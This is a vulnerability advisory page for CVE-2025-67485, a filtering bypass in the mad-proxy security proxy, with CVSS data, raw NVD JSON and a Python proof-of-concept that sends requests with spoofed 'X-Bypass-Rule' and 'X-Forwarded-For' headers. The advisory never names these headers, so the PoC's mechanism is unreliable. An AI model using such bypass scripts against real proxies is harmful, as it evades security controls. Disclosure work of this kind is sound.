Security Vulnerability Report
中文
CVE-2025-67485 CVSS 5.3 MEDIUM

CVE-2025-67485

Published: 2025-12-10 01:15:52
Last Modified: 2026-03-09 13:37:35
Source: [email protected]

Description

mad-proxy is a Python-based HTTP/HTTPS proxy server for detection and blocking of malicious web activity using custom security policies. Versions 0.3 and below allow attackers to bypass HTTP/HTTPS traffic interception rules, potentially exposing sensitive traffic. This issue does not have a fix at the time of publication.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:machphy:mad-proxy:*:*:*:*:*:python:*:* - VULNERABLE
mad-proxy <= 0.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-67485 PoC - mad-proxy Traffic Interception Bypass This PoC demonstrates bypassing HTTP/HTTPS traffic interception rules in mad-proxy versions 0.3 and below. """ import requests import sys def test_bypass(target_url, proxy_server): """ Test if the proxy allows traffic that should be blocked. """ proxies = { 'http': f'http://{proxy_server}', 'https': f'http://{proxy_server}' } # Crafted request with bypass payload headers = { 'X-Bypass-Rule': '1', 'X-Forwarded-For': '127.0.0.1', 'User-Agent': 'Bypass-Test-POC/1.0' } try: response = requests.get( target_url, headers=headers, proxies=proxies, timeout=10, verify=False ) print(f"[*] Request Status: {response.status_code}") print(f"[*] Response Headers: {dict(response.headers)}") if response.status_code == 200: print("[!] Bypass successful - Traffic was not intercepted") return True else: print("[-] Request blocked or failed") return False except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False def main(): if len(sys.argv) < 3: print(f"Usage: {sys.argv[0]} <target_url> <proxy_server:port>") print(f"Example: {sys.argv[0]} http://malicious-site.com 192.168.1.100:8080") sys.exit(1) target_url = sys.argv[1] proxy_server = sys.argv[2] print(f"[*] Testing CVE-2025-67485 bypass on {target_url}") print(f"[*] Using proxy: {proxy_server}") test_bypass(target_url, proxy_server) if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67485", "sourceIdentifier": "[email protected]", "published": "2025-12-10T01:15:52.137", "lastModified": "2026-03-09T13:37:34.503", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "mad-proxy is a Python-based HTTP/HTTPS proxy server for detection and blocking of malicious web activity using custom security policies. Versions 0.3 and below allow attackers to bypass HTTP/HTTPS traffic interception rules, potentially exposing sensitive traffic. This issue does not have a fix at the time of publication."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-693"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:machphy:mad-proxy:*:*:*:*:*:python:*:*", "versionEndIncluding": "0.3", "matchCriteriaId": "494A26D7-AF8D-4549-8D5A-09C1E7113717"}]}]}], "references": [{"url": "https://github.com/machphy/mad-proxy/security/advisories/GHSA-wx63-35hw-2482", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.